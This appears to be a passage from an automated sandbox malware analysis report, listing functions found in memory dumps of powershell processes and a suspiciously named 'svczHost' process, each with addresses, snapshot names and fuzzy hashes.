                                                                                      • String ID: *_Z$@*_Z$`*_Z$*_Z
                                                                                      • API String ID: 0-2260153620
                                                                                      • Opcode ID: 975ae84c5ed895fea22f9d37e3a87fb926a73912e618b11a09cf9fc8befd0ebd
                                                                                      • Instruction ID: c15f6bf99f226fff4a113f812dd55734d14434f96b294b12152fa7e0a5d77919
                                                                                      • Opcode Fuzzy Hash: 975ae84c5ed895fea22f9d37e3a87fb926a73912e618b11a09cf9fc8befd0ebd
                                                                                      • Instruction Fuzzy Hash: 4011C2DBA0E4C20FE3218B1D3C1262D5ED9BFD1A5070D06F7D088821DB549CA946D285

                                                                                      Executed Functions

                                                                                      Function 00007FF95A293C85 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.6990897730.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bdc8d2a3dd889a3e66bfe451770d4b7d984521b8ac512563cc3d88edbd75c5dd
                                                                                      • Instruction ID: 438e69bd004c97eddc240f945084d5a05e915ff4506d46640e0e2e36c3827730
                                                                                      • Opcode Fuzzy Hash: bdc8d2a3dd889a3e66bfe451770d4b7d984521b8ac512563cc3d88edbd75c5dd
                                                                                      • Instruction Fuzzy Hash: 6101447111CB0C8FD744EF0CE451AA5B7E0FB95324F50056DE58AC3651DA36E881CB46

                                                                                      Executed Functions

                                                                                      Function 00007FF95A7A3233 Relevance: 1.8, Strings: 1, Instructions: 560COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7786398006.00007FF95A7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a7a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: pn|Z
                                                                                      • API String ID: 0-399290
                                                                                      • Opcode ID: a0c8528e30136ee61c03ad1c8c6b6d68b2fb97bcd9dd47cf0ae0b3a40c6c3140
                                                                                      • Instruction ID: 8b1389fb4a0da38f5a83f1270473ed29415bdc6f7eb49c5de1673e8375a47102
                                                                                      • Opcode Fuzzy Hash: a0c8528e30136ee61c03ad1c8c6b6d68b2fb97bcd9dd47cf0ae0b3a40c6c3140
                                                                                      • Instruction Fuzzy Hash: DAF1F331E0D7C56FE356DF3898666A43FE1EF42210B0D01FBD089CB5A3DAA9A846C355
                                                                                      Function 00007FF95A7A2601 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7786398006.00007FF95A7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a7a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: pg\Z
                                                                                      • API String ID: 0-2589132951
                                                                                      • Opcode ID: 7fc7df73f576ef7f138dae7e57a7372a54914f656a99780b62f00a56b203d724
                                                                                      • Instruction ID: c0933cdeca602e7993fc995db4559ad6ddd5488ee42b47a8e6958a4e39d7b388
                                                                                      • Opcode Fuzzy Hash: 7fc7df73f576ef7f138dae7e57a7372a54914f656a99780b62f00a56b203d724
                                                                                      • Instruction Fuzzy Hash: 7B613172E0DA891FEB95DF285868BA17BE1EFA5310B1C01FAC14DC75A2DE58ED458380
                                                                                      Function 00007FF95A3626F9 Relevance: .4, Instructions: 386COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7774213265.00007FF95A360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a360000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0017e72319286ac1a22ff76de56244d0cecb5ded6abddd76dda626f7fc90ab22
                                                                                      • Instruction ID: d52dd7f18dfcddcb83b6bff59f7528795b93000ba540d21a2ca24bbe519e2b20
                                                                                      • Opcode Fuzzy Hash: 0017e72319286ac1a22ff76de56244d0cecb5ded6abddd76dda626f7fc90ab22
                                                                                      • Instruction Fuzzy Hash: 5BA11362E0DB860FE799CB6C68957B43BD1EF96254B0E01FFC089C7193DD69B8068385
                                                                                      Function 00007FF95A2951A8 Relevance: .1, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7771674146.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 333a79a6d45d6ff0e6b0b3a02acc660a64a840f52c02eb99dae0202c3cc893cb
                                                                                      • Instruction ID: 1e787ee24b04d6a529d7713ad2411b4bbec74129549428e3b93cdf2bcf7a2233
                                                                                      • Opcode Fuzzy Hash: 333a79a6d45d6ff0e6b0b3a02acc660a64a840f52c02eb99dae0202c3cc893cb
                                                                                      • Instruction Fuzzy Hash: 8B411470A0C64A9FEB94EF1DC447BB93BE1EF59710F1840B9E449C3192CA69F882C784
                                                                                      Function 00007FF95A17EEAA Relevance: .1, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7769468010.00007FF95A17D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A17D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a17d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 608ab281ab3b9b2d0ece18c90fe9fbc4deae6d5145a651eee582413ea41a4704
                                                                                      • Instruction ID: ee694759d956babe672e49464d42409199ab180bd71f686d904dfdd227a87282
                                                                                      • Opcode Fuzzy Hash: 608ab281ab3b9b2d0ece18c90fe9fbc4deae6d5145a651eee582413ea41a4704
                                                                                      • Instruction Fuzzy Hash: EA41AB6280EBC58FDB5ADB3898556513FF0EF17250B0945EBD088CF0E3E568A849C766
                                                                                      Function 00007FF95A294BF5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7771674146.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7ab5ef147f6d93f55cbd6557f45061915332ca7cb6639781e1ba0232b710ef6d
                                                                                      • Instruction ID: 3da8679171b6d823fa8143612f34a045fa7c3dc9d2b9e0b82d8513cb5d9fcf44
                                                                                      • Opcode Fuzzy Hash: 7ab5ef147f6d93f55cbd6557f45061915332ca7cb6639781e1ba0232b710ef6d
                                                                                      • Instruction Fuzzy Hash: DC01447111CB0C8FDB48EF0CE451AA5B7E0FB95324F10056DE58AC3651DA26E881CB46
                                                                                      Function 00007FF95A29BF21 Relevance: .0, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7771674146.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aa69b46e31f02ba7b07c694258dbadfa5c3c9cfd305a54f53a9e646b3f381274
                                                                                      • Instruction ID: 91991374d07c9e2f36abfa92ee24d63bc1159bea1fe4794477de53c18d83d7f7
                                                                                      • Opcode Fuzzy Hash: aa69b46e31f02ba7b07c694258dbadfa5c3c9cfd305a54f53a9e646b3f381274
                                                                                      • Instruction Fuzzy Hash: A9F0F662A1DA851FE741EB2C68253A43BD2FF89750F1941F6D08CCB1C3DD5CAD4A8396
                                                                                      Function 00007FF95A7A26F6 Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7786398006.00007FF95A7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a7a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 56a861d994c4b0cfab4b5a31bfd0ae0de5f2899f78398f6539921d4471ef5b54
                                                                                      • Instruction ID: 69bb5931ee93d27382832a9606506984092339f98830a83e8145d85e205d2695
                                                                                      • Opcode Fuzzy Hash: 56a861d994c4b0cfab4b5a31bfd0ae0de5f2899f78398f6539921d4471ef5b54
                                                                                      • Instruction Fuzzy Hash: 1AF03A72E08A1A5FE795EB5C68483A563D1EF98261F1C01B6C60DC32A5DE98AAA046C4
                                                                                      Function 00007FF95A2937D2 Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7771674146.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c93876a584a83f57bb208291d44f1980a468ee3b1211ca0d9a54c0db6360dce0
                                                                                      • Instruction ID: 4887edaa1e8e6e08f841465f278704d00db4198d7a46d09b70a5038728d0589a
                                                                                      • Opcode Fuzzy Hash: c93876a584a83f57bb208291d44f1980a468ee3b1211ca0d9a54c0db6360dce0
                                                                                      • Instruction Fuzzy Hash: C9F0373275C6044FDB4CEA1CF8529B577D1EB95324B04056EE48BC2657D927E4428785
                                                                                      Function 00007FF95A293818 Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7771674146.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7fad3cc8be6c35849b1bbe24a4397c9c56e87639586eea8c5be30edfaad1929d
                                                                                      • Instruction ID: dcd7ee5d0fa3dae35f2cd453e92809f0dcd69f5108ac8e8be9ca012643d8036d
                                                                                      • Opcode Fuzzy Hash: 7fad3cc8be6c35849b1bbe24a4397c9c56e87639586eea8c5be30edfaad1929d
                                                                                      • Instruction Fuzzy Hash: BAF0653275C6094FDB4CEA1CF8429B573D1EB99320B10017EF48BC2697D927F882C686
                                                                                      Function 00007FF95A7A4634 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7786398006.00007FF95A7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a7a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 879e99d864388e65c22f7740d9c62005f33a2589f8870a9113ec510bac4c5114
                                                                                      • Instruction ID: c867dcb37cc8dceaaa561196e40648e2711c515e2e2b1b08d425e849322f032a
                                                                                      • Opcode Fuzzy Hash: 879e99d864388e65c22f7740d9c62005f33a2589f8870a9113ec510bac4c5114
                                                                                      • Instruction Fuzzy Hash: AEF0823131CA044BD748EE2D94456A1B7E0FBA8310F10462EE44AC3251DA21E4818782
                                                                                      Function 00007FF95A29941E Relevance: .0, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7771674146.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9d29bf2c848dbea66289eb6b8c23b197c3bbd45bf70484cd39329c0acd1c59d3
                                                                                      • Instruction ID: b51dfe3a8b10c6661a17e3e075f2086699c913d07d6f6a841ce56f4b01243f1c
                                                                                      • Opcode Fuzzy Hash: 9d29bf2c848dbea66289eb6b8c23b197c3bbd45bf70484cd39329c0acd1c59d3
                                                                                      • Instruction Fuzzy Hash: D0B0124097D82B07AA40B76C70022FDA2815FC1520B8118B0F50CC01C7CCCD3FC20085

                                                                                      Non-executed Functions

                                                                                      Function 00007FF95A298962 Relevance: 7.6, Strings: 6, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7771674146.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: S_^$S_^"$S_^$$S_^%$S_^)$S_^+
                                                                                      • API String ID: 0-2252061713
                                                                                      • Opcode ID: 3c8f0e92c42856f5ff96cdab2e30baf23c0db21ea15532dea9b35e29819a64ad
                                                                                      • Instruction ID: 7685c3c9b92ad91aa7c8ad8b509c961da95a5233bcd242d94846067f9d4ef4d6
                                                                                      • Opcode Fuzzy Hash: 3c8f0e92c42856f5ff96cdab2e30baf23c0db21ea15532dea9b35e29819a64ad
                                                                                      • Instruction Fuzzy Hash: 4321E1A3A182151FE310AE6CF8C93D53780DF18674B0581B6D6DC8E2C3FD642A4A8595
                                                                                      Function 00007FF95A298A6A Relevance: 5.1, Strings: 4, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7771674146.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: S_^$S_^0$S_^:$S_^<
                                                                                      • API String ID: 0-455018057
                                                                                      • Opcode ID: 70382c1d44ab222f348698086bd698e15ed0b235ec5156361c3161e9c61428ed
                                                                                      • Instruction ID: ffa07d4096a2dd2689cce9184c567349244c31c310227a8c3c45cafd4e43797a
                                                                                      • Opcode Fuzzy Hash: 70382c1d44ab222f348698086bd698e15ed0b235ec5156361c3161e9c61428ed
                                                                                      • Instruction Fuzzy Hash: 7C3192A3A181624FE310AF1DF8DA3D5BBC0EF61664B1841F3C2D88A1C7FD547A868684
                                                                                      Function 00007FF95A295F68 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.7771674146.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #$!+$"3$S_^
                                                                                      • API String ID: 0-4031307438
                                                                                      • Opcode ID: a4658148bf3553aff0e6b2fdb1ca69091c5da5d0045ea373b816a078334a774d
                                                                                      • Instruction ID: 8a2530674d11b207742ebf673127b35d0d4befc315ad7bde7fe82c69c204b893
                                                                                      • Opcode Fuzzy Hash: a4658148bf3553aff0e6b2fdb1ca69091c5da5d0045ea373b816a078334a774d
                                                                                      • Instruction Fuzzy Hash: 0A11B4A7B396225DA200797EFCC56DE93DCDFD8575B140233E309C61C6E884364A42F4

                                                                                      Non-executed Functions

                                                                                      Function 00007FF60711BFE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.8193295225.00007FF607061000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF607060000, based on PE: true
                                                                                      • Associated: 00000012.00000002.8193232226.00007FF607060000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.8194597435.00007FF6074DF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.8195035980.00007FF607651000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.8195035980.00007FF607767000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.8195035980.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.8195826014.00007FF607975000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.8195864238.00007FF607976000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.8195864238.00007FF60798F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.8195864238.00007FF607992000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.8195864238.00007FF607994000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.8196040581.00007FF607997000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ff607060000_svczHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                      • Instruction ID: 3b1ecc8e75c0c06db543f59f4c59e65d090f2ba030c17af281b41a05b99e746c
                                                                                      • Opcode Fuzzy Hash: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                      • Instruction Fuzzy Hash: 74113C26B14F0A8AEF00CF60E8542B833A4FB19768F541E31EE6D867A9DF78D194C340

                                                                                      Executed Functions

                                                                                      Function 00007FF95A2877A6 Relevance: .5, Instructions: 469COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000016.00000002.7741001421.00007FF95A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A280000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_22_2_7ff95a280000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c08245e80482222310a9b8a2879423090ae5e1c3891f33dc4391bbbe30ea6a9b
                                                                                      • Instruction ID: d457346a73d738d0ef38bf6f0fa2ec01d8da13b4a5433a53f84a7822c99dafd1
                                                                                      • Opcode Fuzzy Hash: c08245e80482222310a9b8a2879423090ae5e1c3891f33dc4391bbbe30ea6a9b
                                                                                      • Instruction Fuzzy Hash: CFF19130918B8E8FEBA8DF28C8567E977D1FF55310F04426EE84DC7291DB74A9458B82
                                                                                      Function 00007FF95A288552 Relevance: .5, Instructions: 456COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000016.00000002.7741001421.00007FF95A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A280000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_22_2_7ff95a280000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 10f7d8ffc5dab5adb2dc68fe163a329ee3ceeb96f6ec29b7f67632720d9f0ef1
                                                                                      • Instruction ID: 3ccc0f3af2fb954ae638eed7d4abcfc033f9a2eb7004abfa0898a69e6e303f91
                                                                                      • Opcode Fuzzy Hash: 10f7d8ffc5dab5adb2dc68fe163a329ee3ceeb96f6ec29b7f67632720d9f0ef1
                                                                                      • Instruction Fuzzy Hash: CCE1B730918A4E8FEBA8DF28C8567F97BD1FF54350F04426EE84DC7691DE74A9418B81
                                                                                      Function 00007FF95A288166 Relevance: .3, Instructions: 329COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000016.00000002.7741001421.00007FF95A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A280000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_22_2_7ff95a280000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 041f41d1216bdabea191353fcdf353288849ecc38f367b68d3cdf03b790cd775
                                                                                      • Instruction ID: e802cbe9be57d674928b891a1e1f4184457991be36a0b9da6609fb3a811357d1
                                                                                      • Opcode Fuzzy Hash: 041f41d1216bdabea191353fcdf353288849ecc38f367b68d3cdf03b790cd775
                                                                                      • Instruction Fuzzy Hash: 7BB1C530518B4E4FEBA8DF28D8567E93BD1FF55350F04426EE84DC3692CE74A9418B86
                                                                                      Function 00007FF95A287C64 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000016.00000002.7741001421.00007FF95A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A280000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_22_2_7ff95a280000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0cb77d22b6746e465363a7532ad4ff838785ee5355511622524dea59fe1c915a
                                                                                      • Instruction ID: 8f7df624d9a628a967f5c36c4d6150a20d6bbd5827a49156e47e427d45f49ab0
                                                                                      • Opcode Fuzzy Hash: 0cb77d22b6746e465363a7532ad4ff838785ee5355511622524dea59fe1c915a
                                                                                      • Instruction Fuzzy Hash: D9311C3091864E8EFBB8DF18CC0ABF932D1FF45329F440179E40EC6192DAB87985DA19
                                                                                      Function 00007FF95A2833B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000016.00000002.7741001421.00007FF95A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A280000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_22_2_7ff95a280000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab133de89e99e409522d923d3be1d99cae334341430f90da174e7b8153fc8aaf
                                                                                      • Instruction ID: 1a95d5bb04cce82493dc2adc58c8f780f3f6ece99c634f3c92b7cfbcc39046ce
                                                                                      • Opcode Fuzzy Hash: ab133de89e99e409522d923d3be1d99cae334341430f90da174e7b8153fc8aaf
                                                                                      • Instruction Fuzzy Hash: EB01447111CB0D8FD744EF0CE451AA5B7E0FB95324F10056DE58AC3651DA36E882CB46
                                                                                      Function 00007FF95A28344A Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000016.00000002.7741001421.00007FF95A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A280000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_22_2_7ff95a280000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6bea468cbab5410d2f98dc8655c785808db4d800d5f519d5cd716be42fa3b978
                                                                                      • Instruction ID: b8413edee285f115457ce109e3b043df0a73f52abdd4216a29255f933bedb688
                                                                                      • Opcode Fuzzy Hash: 6bea468cbab5410d2f98dc8655c785808db4d800d5f519d5cd716be42fa3b978
                                                                                      • Instruction Fuzzy Hash: A0D0A77324C7054FE63C8B0CF8531F473D0DB42234B5002AFE187C48A2D51774938688

                                                                                      Executed Functions

                                                                                      Function 00007FF95A2A51E0 Relevance: .3, Instructions: 300COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ec66067930a8e109c8fe2a5cff33054f2570f66e3fdb3332332152ca0c87e3f
                                                                                      • Instruction ID: b57ba6c7143a4f1c6f435d3cdb952a4a36ce41d849c8ee5915c302f9e2076486
                                                                                      • Opcode Fuzzy Hash: 6ec66067930a8e109c8fe2a5cff33054f2570f66e3fdb3332332152ca0c87e3f
                                                                                      • Instruction Fuzzy Hash: 62910576E1851A4EEB14EB3DE8467FE73E0DFD0721F1441BED10AD7182EEA4B8098694
                                                                                      Function 00007FF95A2A699E Relevance: 2.7, Strings: 2, Instructions: 209COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PpXZ$PpXZ
                                                                                      • API String ID: 0-3611675017
                                                                                      • Opcode ID: 7b1241449ba2b1c3907f7b95600d94b3bb1b7c1ac7548a517c011c8c29cff04e
                                                                                      • Instruction ID: 98d9750ec28bc85855e4b7309110e21eb8eaf61d5ff560527444b5295d9ef5aa
                                                                                      • Opcode Fuzzy Hash: 7b1241449ba2b1c3907f7b95600d94b3bb1b7c1ac7548a517c011c8c29cff04e
                                                                                      • Instruction Fuzzy Hash: CF61C132908A1D8FDB68DF18D8557E9B7F1FF68310F0482AAD04DE3251DBB4A985CB80
                                                                                      Function 00007FF95A2A6AA0 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PpXZ$PpXZ
                                                                                      • API String ID: 0-3611675017
                                                                                      • Opcode ID: 30356fff87da60c38f34fe98488ffe200a9536e0f1fb4f6d84e15b21c993b14b
                                                                                      • Instruction ID: 7613acbcb907d2cefc9c7b3c253b33c243239e5f08527af06bacdb3cac32be08
                                                                                      • Opcode Fuzzy Hash: 30356fff87da60c38f34fe98488ffe200a9536e0f1fb4f6d84e15b21c993b14b
                                                                                      • Instruction Fuzzy Hash: 1D41D532908A1D8EEB64DF58D8417E8B7F1FF58310F0486AAD04EE3581DBF46945DB84
                                                                                      Function 00007FF95A2A5C10 Relevance: 2.5, Strings: 2, Instructions: 7COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `{XZ$x~XZ
                                                                                      • API String ID: 0-3406217174
                                                                                      • Opcode ID: e02ed70211869ba88700c5b98635c8d46633ec3458b15a4874ff67e6fe2743e7
